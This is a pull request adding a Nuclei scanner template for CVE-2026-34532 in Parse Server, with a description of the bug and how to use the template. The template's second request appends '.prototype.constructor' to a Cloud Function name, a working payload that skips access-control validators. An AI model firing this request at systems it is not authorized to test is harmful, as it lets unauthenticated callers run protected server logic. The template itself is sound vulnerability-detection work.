### PR TITLE
Add CVE-2026-34532 Parse Server Cloud Function prototype validation bypass

### DIFF
--- a/http/cves/2026/CVE-2026-34532.yaml
+++ b/http/cves/2026/CVE-2026-34532.yaml
@@ -1,0 +1,84 @@
+id: CVE-2026-34532
+
+info:
+  name: Parse Server - Cloud Function Validator Bypass via prototype.constructor
+  author: str4k3r
+  severity: critical
+  description: |
+    Parse Server's Cloud Function trigger store resolves a requested function
+    name by traversing its internal store object, while the separate
+    validator store (which enforces access controls such as requireUser,
+    requireMaster, or custom validation logic) fails to mirror that
+    traversal. When a Cloud Function is declared using the function keyword
+    (not an arrow function) and its validator is a plain object or arrow
+    function, appending .prototype.constructor to the function name in the
+    request URL causes the trigger lookup to resolve the handler through its
+    own JavaScript prototype chain (Function.prototype.constructor is the
+    Function constructor itself) while the validator lookup returns nothing
+    for that path, so all access-control enforcement is silently skipped.
+    This lets a completely unauthenticated caller invoke a Cloud Function
+    that is meant to require an authenticated user, the master key, or a
+    custom validator. Fixed by having the trigger store traversal verify
+    each intermediate node is a legitimate store object before continuing,
+    stopping and returning an empty store when it encounters a non-store
+    value such as a function handler. This template requires the operator
+    to supply the name of one of their own app's protected Cloud Functions
+    (one declared with `function` and a validator) via the function_name
+    variable; the placeholder default will not match any real deployment,
+    so unconfigured scans fail closed rather than false-positive. The app_id
+    variable must be set to the target's Parse Application ID (not a secret -
+    it ships embedded in client apps, but every request requires it).
+  reference:
+    - https://github.com/parse-community/parse-server/security/advisories/GHSA-vpj2-qq7w-5qq6
+    - https://github.com/parse-community/parse-server/pull/10342
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-34532
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2026-34532
+    cwe-id: CWE-863
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: parseplatform
+    product: parse-server
+  tags: cve,cve2026,parse-server,authbypass,unauth
+
+variables:
+  function_name: ""
+  app_id: ""
+
+http:
+  - raw:
+      - |
+        POST /parse/functions/{{function_name}} HTTP/1.1
+        Host: {{Hostname}}
+        X-Parse-Application-Id: {{app_id}}
+        Content-Type: application/json
+
+        {}
+
+      - |
+        POST /parse/functions/{{function_name}}.prototype.constructor HTTP/1.1
+        Host: {{Hostname}}
+        X-Parse-Application-Id: {{app_id}}
+        Content-Type: application/json
+
+        {}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 400 || status_code_1 == 403'
+          - 'status_code_2 == 200'
+        condition: and
+      - type: word
+        part: body_2
+        words:
+          - '"result"'
+      - type: word
+        part: body_2
+        words:
+          - 'Invalid function'
+        negative: true


### PR DESCRIPTION
## Vulnerability
Parse Server 8.6.66 validates the normal Cloud Function path but fails to reject the `\.prototype.constructor` suffix. The suffix bypasses the validator and invokes a protected function; 8.6.67 rejects the path.

## Template behavior
The template sends a normal invocation and a prototype-constructor variant, then compares the responses. It reports the bypass only when the protected function is denied normally but succeeds through the crafted path.

## Required configuration
Define an operator-owned protected Cloud Function using the regular `function` declaration form and set `function_name` to it. Set `app_id` to the target application; the function should have a harmless deterministic response.

## Impact
An unauthenticated caller can invoke protected server-side functions and reach privileged application logic.

## Usage
```bash
nuclei -u <authorized-target> -t http/cves/2026/CVE-2026-34532.yaml -var function_name=<protected-function> -var app_id=<parse-app-id>
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
